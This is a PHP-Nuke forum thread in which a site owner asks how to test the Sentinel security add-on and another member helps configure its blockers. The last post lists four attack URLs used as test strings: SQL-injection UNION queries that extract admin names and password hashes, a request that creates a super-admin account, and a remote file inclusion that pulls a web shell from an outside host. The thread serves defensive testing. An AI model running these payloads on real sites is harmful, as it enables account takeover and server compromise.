>> Site Map >> Forums >> PHP-Nuke Security
Forum module - topics in forum:
PHP-Nuke Security - Been hacked? or have a question about securing your site, here's the place.
Testing Sentinel
Hi Guys
I've recently installed Sentinel, I think I've set all the blockers correctly, but is there a way to test if Sentinel is working properly?
I have read the Sentinel docs, and this is what I came away with...
.staccess is where the passwords are stored for the AUTH access (which is working btw)
.htaccess is where I had to copy the block of code from Sentinels admin section to make the AUTH thing work. That's all that is in that file atm.
.tfaccess was empty, but now it's got the following:
| Code: : |
| 24.89.*.*|| da2f46e41370bfc5f1cf5392486ddf19 || 116311279 || PHPSESSID 68.226..*.*|| f6823970a3829aebed3e04bc4352 || 116311282 || PHPSESSID 70.145..*.*|| 941f87e22596f6a9db7cea56572b || 116311284 || PHPSESSID 68.226..*.*|| f6823970a3329aebed3e04bc4352 || 116311304 || PHPSESSID 207.200.*.*|| abe624da7fab0462fe7db43ccb65 || 116311355 || PHPSESSID 75.177.*.*|| d20ad7b5b710cbee4ec4e212ac5b || 116311387 || PHPSESSID |
Are these a good sign?
Apparently blocked IP's should be added somewhere, but either I'm getting lucky and nobody is trying to hack my site, or I may have something setup wrong. I have turned on all of the blockers, but nothing appears to be getting logged, apart from the above.
Please could someone explain to me, or help me test please?
Thanks guys
Mal
It's functioning but it aint blocking further access.
I can still access the site after.
| Quote: : |
| You have been blocked from entering this site. You have attempted a Union attack on this site. All of the following information has been gathered to assist the webmaster should this need to be reported to local or federal law enforcement. If you think this is a mistake you can contact the site webmaster at malekii(at)kohcenter(dot)com. Be SURE to include the following information in any email! User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1) Gecko/20061010 Firefox/2.0 Remote Address: 82.32.209.113 Client IP: none Forwarded For: none Date Blocked: 2006-11-09 @ 17:47:07 CST GMT -0600 Block expires: Unknown |
| Quote: : |
UNION Blocker Settings Activate: Default Page Write to htaccess: Yes Forward To: IP Block Type: Full IP (127.2.3.4) Default Page: Default Email IP lookup: Not Available Reason: Block Duration: Permanent |
These are my settings on the Union blocker thing
Well that's no good, all it does is show people what I quoted above.
The settings on all blockers should be at least email, block and default page.
Ahh, gotcha.
I thought the .htaccess was the important bit, and that the page was just how you told them to get lost lol
On an aside, are there standard tests such as the one you just did, that I can learn? Is it a script? Do you have a URL so that I can take a look please?
Cheers on the config issue Darren, I'll do that now.
Not really, I just tried a url string that had been tried here and blocked.
I'll post up a few for you in a bit.
All blockers now set to Email, block and default page. Top man!
Thanks Darren, appreciate your help mate.
Oooh, can't access your site now.
| Quote: : |
| Forbidden You don't have permission to access /index.php on this server. Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request. |
hehe, I think you're my first "Shameful Hacker" LOL
I'll unban you, one sec
Oh the shame LOL
Can see it again now.
haha
Thanks for testing that with me, I feel much happier now I know it's working. When you have a minute, would you mind posting up those strings for me please? No rush on it, whenever you have the time.
Thanks again Dar.
| Quote: : |
| modules.php?name=Downloads&d_op=viewsdownload&sid=-1/* */UNION/* */SELECT/* */0,0,aid,pwd,0,0,0,0,0,0,0,0/* */FROM/* */nuke_authors/* */WHERE/* */radminsuper=1/* */LIMIT/* */1/* modules.php?name=Search&type=comments&query=not123exists&instory=/* */UNION/* */SELECT/* */0,0,pwd,0,aid/* */FROM/* */nuke_authors index.php?add_aid=adm&add_name=adm&add_pwd=111&add_email=admin@phpnuke.org&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=AddAuthor&Submit=%D1%EE%E7%E4%E0%F2%FC+%E0%E4%EC%E8%ED%E0 modules.php?name=Forums&file=viewtopic&t=2388&xxx=http://freecfm.com/c/coldfsrv/shellnew.php?c=d&d=/usr/home/public_html/forum&highlight=%2527.include($_GET[xxx]).include%2527 |
Just a few random ones.
Thanks a bunch Dar
